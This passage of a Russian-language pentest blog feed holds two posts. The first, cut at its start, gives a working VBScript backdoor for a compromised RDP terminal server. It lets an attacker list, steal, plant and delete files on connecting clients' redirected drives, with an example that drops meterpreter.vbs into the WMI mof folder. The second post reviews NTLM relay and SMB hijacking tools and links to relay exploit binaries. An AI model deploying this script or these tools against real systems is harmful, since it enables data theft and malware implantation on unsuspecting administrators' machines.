&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNMIbz_Tc9_xmoKXYaE21N_FXiaYfA8ADOi5i2OkHOoQC8GL36moFtOIWAw4iZ8eb8Gw0K6rSQy8_2gH6sVdZ4mq15ea9_K_jOIb7ce-OuG80VTjLKGI21T9_PBjhQ2fJYvZ7_GsVw8M4/s1600/mstsc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNMIbz_Tc9_xmoKXYaE21N_FXiaYfA8ADOi5i2OkHOoQC8GL36moFtOIWAw4iZ8eb8Gw0K6rSQy8_2gH6sVdZ4mq15ea9_K_jOIb7ce-OuG80VTjLKGI21T9_PBjhQ2fJYvZ7_GsVw8M4/s400/mstsc.png" width="356" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;i&gt;(прим., в более поздних реализациях клиента была добавлена возможность выбора конкретных дисков для подключения)&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Тут-то и кроется опасность, о которой предупреждает сам rdp-клиент. Тем не менее все администраторы зачастую не обращают на это уже изрядно поднадоевшее сообщение безопасности никакого внимания (так ведь действительно проще, удобнее и быстрее!).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmiY7lpJLRgl1dJSkBd97XjRPgFQLews2inZga9_iIQkwdd7pxDmGZfAgIIen4N9ALbYEbziaQFpPlHf-YjsUNf0M_8dN7ZPFb6OYUXpfkSB_tx_4cq1d5NNCNKZivJCH5kCxHCXpn8bo/s1600/mstsc2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmiY7lpJLRgl1dJSkBd97XjRPgFQLews2inZga9_iIQkwdd7pxDmGZfAgIIen4N9ALbYEbziaQFpPlHf-YjsUNf0M_8dN7ZPFb6OYUXpfkSB_tx_4cq1d5NNCNKZivJCH5kCxHCXpn8bo/s400/mstsc2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Теперь я думаю всем стало понятно про предлагаемый мною сценарий атаки. Соглашаясь на подключение к недоверенному rdp-серверу с торчащими дисками C:\ можно лишиться чувствительных данных, подцепить meterpreter (или чего еще более живучее), поймать del * /f /s /q.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
В качестве демонстрации этого привожу proof-of-concept, который будучи заброшенный в автозагрузку при подключении терминальных пользователей на скомпрометированном сервере позволяет работать с локальными и сетевыми дисками клиента.&amp;nbsp;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Настраиваемые переменные&lt;/b&gt;&lt;br /&gt;
tFolder - задает путь к рабочему каталогу на терминальном сервере&lt;br /&gt;
sleep - задает время задержки между обработкой новых команд&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Поддерживаемые команды&lt;/b&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Чтобы отправить команду, необходимо воспользоваться файлом "cmd.txt". Каждая строка в этом файле воспринимается, как отдельная команда, что позволяет задавать одновременно более одной команды. Для каждого терминального клиента создается свой уникальный каталог по имени rdp-подключения (RDP-Tcp#&amp;lt;порядковый номер&amp;gt;) и свой "cmd.txt" файл соответственно. Копирование и загрузка файлов производится для каждого терминального клиента в его индивидуальном каталоге.&lt;/div&gt;
&lt;br /&gt;
ls:&amp;lt;путь до каталога&amp;gt;&lt;br /&gt;
Листинг файлов и директорий. Пример:&lt;br /&gt;
ls:\\TSCLIENT\C&lt;br /&gt;
...&lt;br /&gt;
&amp;gt;ls \\TSCLIENT\C&lt;br /&gt;
&amp;lt;DIR&amp;gt;&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;Documents and Settings&lt;br /&gt;
&amp;lt;DIR&amp;gt;&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;Program Files&lt;br /&gt;
&amp;lt;DIR&amp;gt;&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;RECYCLER&lt;br /&gt;
&amp;lt;DIR&amp;gt;&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;System Volume Information&lt;br /&gt;
&amp;lt;DIR&amp;gt;&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;Temp&lt;br /&gt;
&amp;lt;DIR&amp;gt;&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;WINDOWS&lt;br /&gt;
&amp;lt;DIR&amp;gt;&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;wmpub&lt;br /&gt;
AUTOEXEC.BAT&lt;br /&gt;
boot.ini&lt;br /&gt;
bootfont.bin&lt;br /&gt;
CONFIG.SYS&lt;br /&gt;
IO.SYS&lt;br /&gt;
MSDOS.SYS&lt;br /&gt;
NTDETECT.COM&lt;br /&gt;
ntldr&lt;br /&gt;
pagefile.sys&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
ll:&amp;lt;путь до каталога&amp;gt;&lt;br /&gt;
Рекурсивный листинг файлов и директорий. Пример:&lt;br /&gt;
ll:\\TSCLIENT\C\Temp&lt;br /&gt;
...&lt;br /&gt;
&amp;gt;ll \\TSCLIENT\C\Temp&lt;br /&gt;
&amp;lt;DIR&amp;gt;&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;RDP-Tcp#2&lt;br /&gt;
&amp;lt;DIR&amp;gt;&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;RDP-Tcp#3&lt;br /&gt;
&lt;br /&gt;
&amp;gt;ls \\tsclient\c\Temp\RDP-Tcp#2&lt;br /&gt;
cmd.txt&lt;br /&gt;
list.txt&lt;br /&gt;
&lt;br /&gt;
&amp;gt;ls \\tsclient\c\Temp\RDP-Tcp#3&lt;br /&gt;
cmd.txt&lt;br /&gt;
list.txt&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
get:&amp;lt;путь до каталога или файла&amp;gt;&lt;br /&gt;
Копирует файл или каталог в рабочую директорию из которой выполнялась команда. Пример:&lt;br /&gt;
get:\\TSCLIENT\C\Windows\repair&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQa2yeh1ZMltSdNn924-Hx1eRwCn7hCN2BNUKRXYLe-hnLla4m3AJd54I5lhkMg9MhtzodYPYdqA3zggEMx2JsBwxynoSdB3eW8YIRVEtjD2tqHwFkVJySSsViNEm-PRxFG-PkgNfKhIk/s1600/tsc_remote_example1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQa2yeh1ZMltSdNn924-Hx1eRwCn7hCN2BNUKRXYLe-hnLla4m3AJd54I5lhkMg9MhtzodYPYdqA3zggEMx2JsBwxynoSdB3eW8YIRVEtjD2tqHwFkVJySSsViNEm-PRxFG-PkgNfKhIk/s320/tsc_remote_example1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
put:&amp;lt;имя файла для отправки&amp;gt;:&amp;lt;путь до каталога назначения&amp;gt;&lt;br /&gt;
Копирует файл, расположенный в рабочей директории, из которой выполнялась команда в каталог назначения. Пример:&lt;br /&gt;
put:meterpreter.vbs:\\TSCLIENT\C\Windows\System32\wbem\mof&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsaj6r9APJ39-w6jVq-33ZZNPBFW4Niluezlut9QiaJZsyMEguBB0_CoJQ-Z5kcOmzKReIPOno6j0Bniz1YiR0tnB749Kzx5qdU5dJEiNHaBRLAU32vr79BK0b-MnuerfguhLPNFmiOVE/s1600/tsc_remote_example2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsaj6r9APJ39-w6jVq-33ZZNPBFW4Niluezlut9QiaJZsyMEguBB0_CoJQ-Z5kcOmzKReIPOno6j0Bniz1YiR0tnB749Kzx5qdU5dJEiNHaBRLAU32vr79BK0b-MnuerfguhLPNFmiOVE/s400/tsc_remote_example2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
rm:&amp;lt;путь до удаляемого файла&amp;gt;&lt;br /&gt;
Удаляет указанный файл. Пример:&lt;br /&gt;
rm:\\TSCLIENT\C\myfile&lt;br /&gt;
&lt;br /&gt;
&lt;textarea class="vb" name="code" rows="50"&gt;On Error resume next

tFolder = "C:\Temp"
sleep = 5000

' - - - -

Set wshShell = CreateObject( "WScript.Shell" )
Set fso = CreateObject("Scripting.FileSystemObject")

rdpsession = wshShell.ExpandEnvironmentStrings("%SESSIONNAME%")
username = wshShell.ExpandEnvironmentStrings("%USERNAME%")

tFolder = tFolder &amp; "\" &amp; rdpsession

If Not fso.FolderExists(tFolder) Then
 fso.CreateFolder tFolder
End If

Set file = fso.CreateTextFile(tFolder&amp;"\list.txt", True)
Set cmd = fso.CreateTextFile(tFolder&amp;"\cmd.txt", True)
cmd.Close
file.WriteLine("Username: " &amp; username)
file.WriteLine("")

With WScript.CreateObject("WScript.Network").EnumNetworkDrives()
 For i = 0 to .Count - 1 Step 2
  UNCpath = .Item(i + 1)
  file.WriteLine("UNC path: " &amp; UNCpath)
  If UNCpath &lt;&gt; "" Then
   ShowFiles UNCpath,0
   file.WriteLine("")
  End If
 Next
End With

do
 Wscript.sleep(sleep)
 set objFile = fso.GetFile(tFolder&amp;"\cmd.txt")
 If objFile.Size &gt; 0 Then
  Set dict = CreateObject("Scripting.Dictionary")
  Set cmd = fso.OpenTextFile (tFolder&amp;"\cmd.txt", 1)
  row = 0
  Do Until cmd.AtEndOfStream
   line = cmd.Readline
   dict.Add row, line
   row = row + 1
  Loop
 cmd.Close

 For Each line in dict.Items
  command = UCase(mid(line,1,3))
  If command = "LS:" Then
   lspath = mid(line,4)
   file.WriteLine("&gt;ls " &amp; lspath)
   ShowFiles lspath,0
   file.WriteLine("")
  ElseIf command = "LL:" Then
   lspath = mid(line,4)
   file.WriteLine("&gt;ll " &amp; lspath)
   ShowFiles lspath,1
   file.WriteLine("")
  ElseIf command = "GET" Then
   getpath = mid(line,5)
   If fso.FileExists(getpath) Then
    fso.CopyFile getpath, tFolder&amp;"\"
   ElseIf fso.FolderExists(getpath) Then
    fso.CopyFolder getpath, tFolder&amp;"\"
   End If
   file.WriteLine("&gt;get "&amp;getpath)
   file.WriteLine("") 
  ElseIf command = "PUT" Then
   t1 = mid(line,5)
   s1 = InStr(1,t1,":")
   filein = mid(t1,1,s1-1)
   dirout = mid(t1,s1+1)
   If fso.FileExists(tFolder&amp;"\"&amp;filein) AND fso.FolderExists(dirout) Then
    fso.CopyFile tFolder&amp;"\"&amp;filein, dirout&amp;"\"
   End If
   file.WriteLine("&gt;put "&amp;tFolder&amp;"\"&amp;filein&amp;" "&amp;dirout&amp;"\")
   file.WriteLine("") 
  ElseIf command = "RM:" Then
   rmpath = mid(line,4)
   If fso.FileExists(rmpath) Then
    fso.DeleteFile rmpath
   End If
   file.WriteLine("&gt;rm "&amp;rmpath)
   file.WriteLine("") 
  End If
 Next

 Set cmd = fso.CreateTextFile(tFolder&amp;"\cmd.txt", True)
 cmd.Close

 End If
loop

file.Close

Sub ShowFiles(Folder,ll)
 On Error resume next
 Dim fso, ObjFolder, ObjOutFile, ObjSubFolders, ObjSubFolder, ObjFiles

 Set fso = CreateObject("Scripting.FileSystemObject")
 Set ObjFolder = fso.GetFolder(Folder)
 Set ObjSubFolders = ObjFolder.SubFolders
 Set ObjFiles = ObjFolder.Files

 For Each ObjSubFolder In ObjSubFolders
  file.WriteLine("&lt;dir&gt;" &amp; Chr(9) &amp; ObjSubFolder.Name)
 Next

 For Each ObjFile In ObjFiles
  file.WriteLine(ObjFile.Name)
 Next

 If ll &lt;&gt; 0 Then
  For Each ObjSubFolder In ObjSubFolders
   file.WriteLine("")
   file.WriteLine("&gt;ls " &amp; ObjSubFolder.Path)
   ShowFiles ObjSubFolder.Path,1
  Next
 End If 
End Sub

&lt;/textarea&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOiQ-mhvocgGsVkL_hFl8mbwC7tTFi62LAMvTOCD9-0Com4EPNB_CRmTyto7ClC4gZ7dBhRs-8EbF0RSrYq2Fpp3SRb1hb8D2LOj3qUprU-Ual0fMKi11k5OUJC-FjcM8SCGGH8HYzrro/s72-c/logo.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total></item><item><title>Взломать за 137 секунд</title><link>http://devteev.blogspot.com/2013/06/137.html</link><category>Microsoft</category><category>Ntlm relay</category><category>pentest</category><category>SMB Hijacking</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Wed, 26 Jun 2013 16:17:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-1837376685321705318</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU8IkWgq1pMFaCCiMIR07-AD_tWOwYW3ckO2SS0M-3SVcmWu1nz0CNWB_PD1XahvEzZMckTRqeVb7h6HaJaD3CTAPkC8pyxuhu8Hw5Twnvn3frXiIp19p1kOibxfKsFkHY1g1m6gfGU2U/s1600/logo.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU8IkWgq1pMFaCCiMIR07-AD_tWOwYW3ckO2SS0M-3SVcmWu1nz0CNWB_PD1XahvEzZMckTRqeVb7h6HaJaD3CTAPkC8pyxuhu8Hw5Twnvn3frXiIp19p1kOibxfKsFkHY1g1m6gfGU2U/s200/logo.jpg" width="200" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Затрагивая тему конечных целей тестирований на проникновение, можно отметить, что в преобладающем большинстве случаев ключевой целью атаки является получение максимальных привилегий в корневом домене Active Directory. Как ни крути, но большинство корпоративных сетей построено на решениях Microsoft и как следствие в качестве централизованного управления идентификаторами и механизмами авторизации к информационным активам используется Microsoft Active Directory. Обладая соответствующими привилегиями в каталоге становиться возможным использовать их для развития огромного числа всевозможных сценариев атак. Поэтому, как правило, после "захвата" домена пентест переходит в другие плоскости. Например, в плоскость технологического аудита или в сторону развития атаки в направлении смежных систем, напрямую не завязанных на Active Directory (коммуникационное оборудование, ERP и пр.).&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Итак, как же можно максимально сократить время на реализацию успешной атаки в отношении каталога домена? Прям до 1 минуты? Я постараюсь раскрыть секрет успеха в данной публикации.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Ntlm relay: начало&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Давным-давно, когда компьютеры были большими брррр... где-то я уже это говорил. В общем, все началось с того, что в компании Microsoft придумали не самый безопасный протокол сетевой аутентификации - &lt;a href="http://en.wikipedia.org/wiki/LAN_Manager"&gt;LanManager&lt;/a&gt;. За ним последовало наследие в виде &lt;a href="http://en.wikipedia.org/wiki/NTLM"&gt;NTLM&lt;/a&gt;, который решал только часть недостатков своего предшественника. Впоследствии, накрутив более тяжелые криптографические алгоритмы, появился NTLMv2, который вместе со своими предшественниками перекантовал и до наших дней.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Но вернемся в прошлое. В 1996 году &lt;a href="http://www.google.com/search?q=%22A+Weakness+in+CIFS+Authentication%22"&gt;появляется первое исследование&lt;/a&gt; на тему фундаментальной уязвимости в протоколе NTLM, а через пять лет появляется и&amp;nbsp;&lt;a href="http://squirtle.googlecode.com/files/NTLM%20is%20Dead%20-%20DefCon%2016.pdf"&gt;полноценный пруфф&lt;/a&gt;. Суть атаки хорошо проиллюстрирована на следующей картинке.&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3h3v8PbUXOpW5bj8ce6P4meHvEfKQKVl-Yf_oJPkq0cXlhtQlGckKsnOU511ZUILEVDl0Wo3MG3o6jOkDWumwoI7lq2eLfWNZRjqvRLN4jZdLjD2uQCp_yYDh4lMfZ0t6JizpEOM18a8/s1600/NTLM_Relay.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3h3v8PbUXOpW5bj8ce6P4meHvEfKQKVl-Yf_oJPkq0cXlhtQlGckKsnOU511ZUILEVDl0Wo3MG3o6jOkDWumwoI7lq2eLfWNZRjqvRLN4jZdLjD2uQCp_yYDh4lMfZ0t6JizpEOM18a8/s400/NTLM_Relay.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
В 2008 году, под давлением появившихся к тому времени готовых к употреблению сплоитов (&lt;a href="https://code.google.com/p/squirtle/"&gt;1&lt;/a&gt;, &lt;a href="http://www.phreak.org/archives/exploits/microsoft/smbrelay.exe"&gt;2&lt;/a&gt;, &lt;a href="http://www.phreak.org/archives/exploits/microsoft/smbrelay2.exe"&gt;3&lt;/a&gt;), компания Microsoft все-таки решает &lt;a href="http://technet.microsoft.com/en-us/security/bulletin/ms08-068"&gt;устранить уязвимость&lt;/a&gt;, однако делает это как нельзя криво и вектор атаки перерождается в новое амплуа.&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv0NB78kbvdaKsGSGt7G1ORqspKn5HQsxaAOYrUtjvtd3FdFeMnM0hzL_NVTn_pT1DG4IbVNe2nMEQ74mnKal4c52ggwP_U3bDdwBluDVE6yvH8W4LqJEt4YIPZvm_2iwbYCsK5hcQk_E/s1600/NTLM_Relay2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv0NB78kbvdaKsGSGt7G1ORqspKn5HQsxaAOYrUtjvtd3FdFeMnM0hzL_NVTn_pT1DG4IbVNe2nMEQ74mnKal4c52ggwP_U3bDdwBluDVE6yvH8W4LqJEt4YIPZvm_2iwbYCsK5hcQk_E/s400/NTLM_Relay2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Кроме того, пресловутый патч &lt;a href="http://technet.microsoft.com/en-us/security/bulletin/ms08-068"&gt;ms08-068&lt;/a&gt; никак не стесняет атакующего, который осуществляет атаку &lt;a href="http://www.xakep.ru/post/55263/"&gt;в отношении кластера&lt;/a&gt;. То есть, сценарий 2001 года частично проигрывается и сегодня.&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Ntlm relay: сегодня&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Несмотря на то, что сегодня атака NTLM Relay широко известна, реализованы концепты межпротокольного перенаправления (например, HTTP-&amp;gt;SMB и наоборот), которые в свою очередь портированы в популярные инструменты пентестера (например, &lt;a href="http://webstersprodigy.net/2012/07/22/metasploit-generic-ntlm-relay-module/"&gt;MSF&lt;/a&gt;), но при всем этом многообразии до 2012 года не хватало универсального "швейцарского ножа". Им стала сборка под названием &lt;a href="https://github.com/zfasel/ZackAttack"&gt;ZackAttack&lt;/a&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
ZackAttack – это фреймворк, который позволяет проводить атаки NTLM-relay на качественно новом уровне. Наибольшую ценность этого фреймворка представляет возможность многократного использования сессии авторизованного пользователя для доступа к любым (с ограничениями) сервисам, авторизация в которых базируется на протоколе NTLM. Другими, не менее ценными достоинствами ZackAttack является автоматизация сценариев атаки (например, создание нового пользователя в Active Directory и добавление его в группу администраторов домена), а также возможность взаимодействия с атакуемыми системами используя пониженные привилегии (отличные от привилегий администратора) поверх &lt;a href="http://proxychains.sourceforge.net/"&gt;proxychains&lt;/a&gt;&amp;nbsp;(см. &lt;a href="https://media.defcon.org/dc-20/video/DEF%20CON%2020%20Hacking%20Conference%20Presentation%20By%20-%20Zack%20Fasel%20-%20Owned%20in%2060%20Seconds%20-%20Slides.m4v"&gt;видео&lt;/a&gt;). Но стоит озвучить и половник дегтя в банке с медом. Дело в том, что &lt;a href="https://twitter.com/zfasel"&gt;Zack Fasel&lt;/a&gt; писал свою балалайку на скорую руку, в следствии чего для эффективного использования текущей сборки ZackAttack требуется бубен, а взаимодействие с атакуемым узлом по протоколу SMB поверх proxychains очень быстро заканчивается на первом же бинарном файле (аналогичная ситуация наблюдается и с передачей паролей через RPC).&lt;/div&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/05W5tUG7z2M?feature=player_detailpage" width="540"&gt;&lt;/iframe&gt;
&lt;/center&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
ЗЫ. Если кто желает пофиксить баги ZackAttack и допилить поддерживаемый функционал, welcome! -- &amp;gt;&amp;gt; &lt;a href="https://twitter.com/zfasel"&gt;@zfasel&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Альтернатива Ntlm relay в режиме реального времени&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Ранее &lt;a href="http://devteev.blogspot.ru/2013/04/ntlm-relay.html"&gt;я уже писал&lt;/a&gt;, что в случае использования аутентификации по протоколу NTLMv1 существует возможность восстановить NT-хеш за приемлемое время, что в перспективе позволяет проводить атаки типа &lt;a href="http://en.wikipedia.org/wiki/Pass_the_hash"&gt;pass-the-hash&lt;/a&gt;. Однако этот метод не работает в случае использования аутентификации по протоколу NTLMv2.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Автор &lt;a href="http://intercepter.nerf.ru/"&gt;Intercepter-NG&lt;/a&gt; взглянул на проблему гораздо шире и глубже. Он задал себе вопрос: "Зачем нам релеить авторизацию жертвы, если она сама прекрасно авторизуется на нужном ресурсе?! Нам всего лишь нужно встать посередине и проксировать соединение, дождаться пока Host_A авторизуется на Host_B, а затем взять контроль над сессией в свои руки!" (&lt;a href="http://habrahabr.ru/post/182954/"&gt;подробнее&lt;/a&gt;). Логика идеи представлена на картинке ниже.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXWICFUG4b6kldwF7nE-9WxB6vLSp3gTNQr2CTLmJojiwHFyEfekg4Zhzb9S0noF59dSRUAWW0QVjEzB1mAYsxyGnRdu-3GGsTz3xycnwAC-zriSkYFf_84ghWjhTHjlOYJvW21z8L4DE/s1600/SMBHijacking.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXWICFUG4b6kldwF7nE-9WxB6vLSp3gTNQr2CTLmJojiwHFyEfekg4Zhzb9S0noF59dSRUAWW0QVjEzB1mAYsxyGnRdu-3GGsTz3xycnwAC-zriSkYFf_84ghWjhTHjlOYJvW21z8L4DE/s400/SMBHijacking.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Реализация данной атаки получила название SMB Hijacking и уже доступна для экспериментов в последней версии &lt;a href="http://intercepter.nerf.ru/"&gt;Intercepter-NG&lt;/a&gt;. Have fun!&lt;/div&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/flgsD6zdAU0?feature=player_embedded" width="540"&gt;&lt;/iframe&gt;&lt;/center&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU8IkWgq1pMFaCCiMIR07-AD_tWOwYW3ckO2SS0M-3SVcmWu1nz0CNWB_PD1XahvEzZMckTRqeVb7h6HaJaD3CTAPkC8pyxuhu8Hw5Twnvn3frXiIp19p1kOibxfKsFkHY1g1m6gfGU2U/s72-c/logo.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">10</thr:total><enclosure length="81920" type="application/octet-stream" url="http://www.phreak.org/archives/exploits/microsoft/smbrelay.exe"/><itunes:explicit>no</itunes:explicit><itunes:subtitle>Затрагивая тему конечных целей тестирований на проникновение, можно отметить, что в преобладающем большинстве случаев ключевой целью атаки является получение максимальных привилегий в корневом домене Active Directory. Как ни крути, но большинство корпоративных сетей построено на решениях Microsoft и как следствие в качестве централизованного управления идентификаторами и механизмами авторизации к информационным активам используется Microsoft Active Directory. Обладая соответствующими привилегиями в каталоге становиться возможным использовать их для развития огромного числа всевозможных сценариев атак. Поэтому, как правило, после "захвата" домена пентест переходит в другие плоскости. Например, в плоскость технологического аудита или в сторону развития атаки в направлении смежных систем, напрямую не завязанных на Active Directory (коммуникационное оборудование, ERP и пр.). Итак, как же можно максимально сократить время на реализацию успешной атаки в отношении каталога домена? Прям до 1 минуты? Я постараюсь раскрыть секрет успеха в данной публикации. Ntlm relay: начало Давным-давно, когда компьютеры были большими брррр... где-то я уже это говорил. В общем, все началось с того, что в компании Microsoft придумали не самый безопасный протокол сетевой аутентификации - LanManager. За ним последовало наследие в виде NTLM, который решал только часть недостатков своего предшественника. Впоследствии, накрутив более тяжелые криптографические алгоритмы, появился NTLMv2, который вместе со своими предшественниками перекантовал и до наших дней. Но вернемся в прошлое. В 1996 году появляется первое исследование на тему фундаментальной уязвимости в протоколе NTLM, а через пять лет появляется и&amp;nbsp;полноценный пруфф. Суть атаки хорошо проиллюстрирована на следующей картинке. В 2008 году, под давлением появившихся к тому времени готовых к употреблению сплоитов (1, 2, 3), компания Microsoft все-таки решает устранить уязвимость, однако делает это как нельзя криво и вектор атаки перерождается в новое амплуа. Кроме того, пресловутый патч ms08-068 никак не стесняет атакующего, который осуществляет атаку в отношении кластера. То есть, сценарий 2001 года частично проигрывается и сегодня. Ntlm relay: сегодня Несмотря на то, что сегодня атака NTLM Relay широко известна, реализованы концепты межпротокольного перенаправления (например, HTTP-&amp;gt;SMB и наоборот), которые в свою очередь портированы в популярные инструменты пентестера (например, MSF), но при всем этом многообразии до 2012 года не хватало универсального "швейцарского ножа". Им стала сборка под названием ZackAttack. ZackAttack – это фреймворк, который позволяет проводить атаки NTLM-relay на качественно новом уровне. Наибольшую ценность этого фреймворка представляет возможность многократного использования сессии авторизованного пользователя для доступа к любым (с ограничениями) сервисам, авторизация в которых базируется на протоколе NTLM. Другими, не менее ценными достоинствами ZackAttack является автоматизация сценариев атаки (например, создание нового пользователя в Active Directory и добавление его в группу администраторов домена), а также возможность взаимодействия с атакуемыми системами используя пониженные привилегии (отличные от привилегий администратора) поверх proxychains&amp;nbsp;(см. видео). Но стоит озвучить и половник дегтя в банке с медом. Дело в том, что Zack Fasel писал свою балалайку на скорую руку, в следствии чего для эффективного использования текущей сборки ZackAttack требуется бубен, а взаимодействие с атакуемым узлом по протоколу SMB поверх proxychains очень быстро заканчивается на первом же бинарном файле (аналогичная ситуация наблюдается и с передачей паролей через RPC). ЗЫ. Если кто желает пофиксить баги ZackAttack и допилить поддерживаемый функционал, welcome! -- &amp;gt;&amp;gt; @zfasel Альтернатива Ntlm relay в режиме реального времени Ранее я уже писал, что в случае использования аутентификации по протоколу NTLMv1 существует возможность восстановить NT-хеш за приемлемое время, что в перспективе позволяет проводить атаки типа pass-the-hash. Однако этот метод не работает в случае использования аутентификации по протоколу NTLMv2. Автор Intercepter-NG взглянул на проблему гораздо шире и глубже. Он задал себе вопрос: "Зачем нам релеить авторизацию жертвы, если она сама прекрасно авторизуется на нужном ресурсе?! Нам всего лишь нужно встать посередине и проксировать соединение, дождаться пока Host_A авторизуется на Host_B, а затем взять контроль над сессией в свои руки!" (подробнее). Логика идеи представлена на картинке ниже. Реализация данной атаки получила название SMB Hijacking и уже доступна для 